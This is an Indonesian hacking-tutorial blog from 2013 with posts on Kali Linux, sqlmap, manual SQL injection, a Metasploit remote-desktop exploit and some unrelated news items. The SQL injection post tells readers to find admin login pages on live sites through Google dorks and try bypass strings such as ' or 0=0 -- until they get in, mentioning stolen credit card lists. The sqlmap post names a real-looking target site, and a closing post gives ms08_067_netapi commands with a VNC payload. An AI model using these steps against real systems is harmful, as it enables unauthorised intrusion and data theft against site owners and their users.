468x60 ads

Backtrack berevolusi menjadi KALI LINUX

Kalian sudah pada tau belom kalo Backtrack Releas ke 6 berganti lable name menjadi KALI LINUX, aneh si bagi orang indonesia karna KALI jauh dari image Penetrasi

Belajar Opensive Scurity Yuk.

” The Quieter you become, the more you are able to hear….. “

Black KALI LINUX

BELAJAR LINUX.blogspot.com info seputar LINUX, BACKTRACK,DAN HACKING TUTORIAL

BELAJAR LINUX4

BELAJAR LINUX4.

BELAJAR LINUX5

BELAJAR LINUX5.

Wednesday, 3 April 2013

evolusi Backtrack | KALI Linux

BELAJAR LINUX - belom lama ini dan masih hangat backtrack realizeeee versi ke 6 nya merubah nama menjadi " KALI LINUX " awal nya cukup shock juga ya secara gw orang indonesia yang tau bahwa  KALI itu sungai, ko terdengar aneh,

gw juga bertanya2 apakah susunan directory nya sama seperti backtrack, salah satu dedengkot tiger team yang udah pakek yaitu red-dragon bercuap katanya sih beda, mungkin gw akan setengah budeg nyari sqlmap di kali linux. ok mari kitaserius membahasnya

"Jadi, apa perbedaan antara BackTrack dan Kali Linux?" Anda mungkin bertanya. Sayangnya bagi kita, itu bukan pertanyaan sederhana untuk menjawab. Ini adalah campuran antara "segalanya" dan "tidak banyak", tergantung pada bagaimana Anda menggunakan BackTrack.

Dari perspektif pengguna akhir, perubahan yang paling jelas akan beralih ke Debian dan sistem FHS-compliant. Apa artinya ini adalah bahwa alih-alih harus menavigasi melalui pohon / pentest, Anda akan dapat memanggil alat apapun dari mana saja pada sistem sebagai aplikasi setiap termasuk dalam jalur sistem. Namun, ada banyak sihir tersembunyi di kalimat terakhir. gw sih akan segera daftar beberapa manfaat baru dari langkah ini.


Buat yang mau download silahkan aja langsung download di situs resminya di :
copy link berikut ini :

http://www.kali.org/downloads/

Tuesday, 2 April 2013

how to install sqlmap on ubuntu

kembali di BELAJAR LINUX  para nuxcyber anda pakek ubuntu os? tp mau hacking menggunakan sqlmap? ok sama aja kok sama2 anak ibu  Debian yg cantik =) kalian bisa install sendiri di ubuntu kalian walau gak pakek backtrack kalian tetap bisa menjalankan tutorial hacking menggunakan sqlmap di blog ini
sqlmap deb

sqlmap - automatic SQL injection tool
Distribution: Ubuntu 10.04.4 LTS
Repository: Ubuntu Universe i386
Package name: sqlmap
Package version: 0.6.4-1
Package architecture: all
Package type: deb
Binary package: sqlmap_0.6.4-1_all.deb
Source package: sqlmap
Installed size: 1,02 MB
Download size: 129,35 KB

sqlmap goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.


on all distributions
Install Howto ? hear me ..

Update the package index:# sudo apt-get update

Install sqlmap deb package:# sudo apt-get install sqlmap

tutorial sqlinjection di windows tanpa sqlmap

Kali ini TUTORIAL SQL INJECTION secara manual tanpa menggunakan sqlmap, ini penting lho, sesekali anda sedang tidak membawa laptop anda yang berisikan linux (belajar linux) anda yang berisi backtrack anda, so mau gak mau pakek komputer di depan mata, yah cuma bermodalkan internet dan browser, pelajari step by step yah jng sampe karna terburu2 jadi lost deh ..

Pengertian SQL Injection
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.


Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice



Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection

Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :


Berubah menjadi :

Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :

Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :


3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :

Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true
for i = 1 to len( input )
c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}


3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

TAPI LEBIH ASYIK PAKEK BACKTRACK LINUX W CUMA KASIH SOLUSI KALO LG KPEPET DOANG, TP BAIKNYA SIH PAKEK OPENSOUUUUURRRCEEEEEEEEEEE...!!!

Monday, 1 April 2013

Exploit Database menggunakan SQLMap

saya mau mengulang share tentang eksploitasi database bermodal SQLMAP di << back | track. Saat ini banyak sekali aplikasi web yang menggunakan database sebagai data manager, selain mudah dalam menganalogikanny dengan script PHP, database juga relatif mudah dioperasikan. Tapi database juga memiliki kelemahan dalam pertahanan dan sekuritasnya. Makanya eksploitasi database relatif mudah dilakukan.


Konsep dari penyerangan ini sendiri adalah assessment, mapping, lalu auditing. Klasiknya dengan memanfaatkan Mantra untuk menjajal payload database yang kira-kira cocok. Mudahnya dengan menggunakan SQLMap untuk menentukan payload yang bisa digunakan untuk eksploitasi database

Tool's Yang diperlukan:

SQLMap download di sini.Langkah pertama adalah memahami konsep SQL injection, untuk mempersingkat waktu, saya tidak akan menjelaskannya di sini. Secara garis besar, kamu harus memanfaatkan alamat web dengan embel-embel "blablabla.php?id=xx". Dimana "xx" adalah karakter unik yang merujuk pada sebuah database. Untuk mencari target URL seperti ini. Gunakan Google dork. Caranya, ketik ini pada Google search bar:


inurl:"php?id="


Lalu "Enter", dan beberapa website dengan embel-embel URL "php?id=" akan tampil. Pilih salah satu kemudian buka websitenya. Tekan CTRL + L lalu CTRL + C, ini berfungsi untuk mengkopi semua isi URL pada address bar. Lanjut, buka terminal, lalu ikuti modul berikut:

root@bt:~# cd /pentest/database/sqlmap/
root@bt : 
/pentest/database/sqlmap# ./sqlmap.py --help

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

Usage: python ./sqlmap.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)

Target:
At least one of these options has to be specified to set the source to
get target urls from.

-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
[snip...]
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
[snip...]



Setelah itu kita dapat mengetahui command dasar untuk menggunakan sqlmap, mulailah bereksplorasi (= Kali ini saya menggunakan website:


http://www(dot)esteler77(dot)com/product.php?subnav=14&subs=18


coursey by : www (dot) double-dragon(dot)blogspot(dot)com

Sunday, 31 March 2013

cara menggunakan Sqlmap backtrack


Introduction

Lo tau gak kalo semenjak kedatangan backtrack yang meng include tools SQLMAP di dalamnya ini sangat mempermudah para peretas dalam melancarkan aksinya. hanya dengan beberapa instruksi maka sqlmap sudah bisa menjalankan teknik manual kita yaitu sql injection level 3, dari segi durasi tentunya lebih hemat kan.. ok cekidot ..

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystemcommand.
Refer to the wiki for an exhaustive breakdown of the features.

Download

You can download the latest tarball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
demo lihat disini : http://sqlmap.org/

Friday, 29 March 2013

Berita kecelakaan di tol TB Simatupang 2013-03

berita terkini akhirpekan ini Sebuah mobil sedan jenis Camry hitam bernopol B 1596 KV mengalami kecelakaan tunggal di Tol TB Simatupang dini hari tadi. Dua orang yang berada dalam mobil nahas tersebut tewas. 

"Iya, keduanya tewas. Sopir dan penumpang," ujar Kasat Lantas Polres Jaksel AKBP Hindarsono saat dihubungi, Sabtu (30/3/2013). 

Hindarsono mengatakan dua orang yang tewas diketahui bernama Yassir Luthfi Marfadi (31) sebagai sopir, dan Winda Anggraini (25). 

Kecelakaan tersebut terjadi pukul 04.00 WIB dini hari tadi. Kecelakaan terjadi di Km 25.400 arah Pasar Rebo. Polisi masih menelusuri kasus kecelakaan tersebut.

Wednesday, 27 March 2013

Berita Menolak Dipenjara Tapi Nongol di PBB, Susno Harus Segera Dieksekusi


Terpidana kasus korupsi Susno Duadji, mangkir dari panggilan eksekusi kejaksaan sebanyak 3 kali. Susno tiba-tiba hadir saat bergabung dengan salah satu partai politik.

Wakil Ketua Komisi III DPR Al Muzammil Yusuf, meminta kejaksaan segera menjalankan kewenangannya.

"Kejaksaan punya wewenang (menindaklanjuti mangkirnya Susno) dan mereka punya aparat untuk melaksanakan itu. Apakah akan panggil paksa atau apa itu kewenangan kejaksaan," kata Al Muzammil Yusuf saat berbincang dengan detikcom, Kamis (28/3/2013).

Kejaksaan diminta menjalankan wewenangnya dalam menghadapi terdakwa yang mangkir. Kalau ternyata ada alasan lain yang menyebabkan Susno tak hadir maka bisa disampaikan baik secara hukum ke kejaksaan atau politik ke DPR.



"Dialog saja pengacara dengan kejaksaan apa masalahnya. Kalau pihak pengacara ada komplain secara politik kami membuka untuk laporkan kepada kami. Kami mengetahui masalah ini," ungkapnya.

"Jadi kalau soal jemput paksa itu soal kejaksaan, tapi kalau setelah jemput paksa ada komplain bisa lapor kepada kita," lanjut politisi PKS itu.

Sebelumnya terpidana korupsi penanganan perkara PT Salmah Arwana Lestari (SAL) dan dana penanganan pilkada Jabar tahun 2008 Susno Duadji, mangkir dari panggilan kejaksaan. Jenderal polisi itu malah terlihat muncul bergabung dengan Partai Bulan Bintang (PBB) pada Rabu (27/3) kemarin


coursey by : detik

Sunday, 24 March 2013

Berita Pemerintah membuat peraturan Ecommerce harus domain co.id

       Halo kali ini saya mereview Berita tentang Pemerintah yang membuat peraturan Ecommerce harus menggunakan domain co.id, beritanya sih gitu tp jangan hawatir banyak yang gak setuju kok karena tau sebdiri domain co.id harus punya ijin ini itu yang buat males ecommerce menengah kebawah.

      Ya bayangin aja lagi pula emangnya kita mau apah cuma bersaing di pasar local.. padahal internet peluang globalnya luas banget, so menurut gw masih kurang baik lah cara seperti ini , mendingan e commerce nya aja yg di review satu persatu .



Thursday, 21 March 2013

Hacking Tutorial : Remote Desktop xp

Kembali lagi belajar TUTORIAL HACKING bersama belajar linux,kali ini mau ngasih tau cara meremote desktop windows XP menggunakan Backtrack.

oke langsung aja open termial BACKTRACK kamu
ctrl + t

---------------------------------------------------------
~#: msfconsole

msf> use exploit/windows/smb/ms08_067_netapi                  
msf > set PAYLOAD windows/vncinject/bind_tcp                

msf> set LHOST [IP KAMU]                                              
msf> set RHOST [IP TARGET]                                           
msf> exploit                                                                          

silahkan dipergunakan dengan bijak

Penulis tidak bertanggung jawab atas kerugian apapun ok..


Twitter Delicious Facebook Digg Stumbleupon Favorites More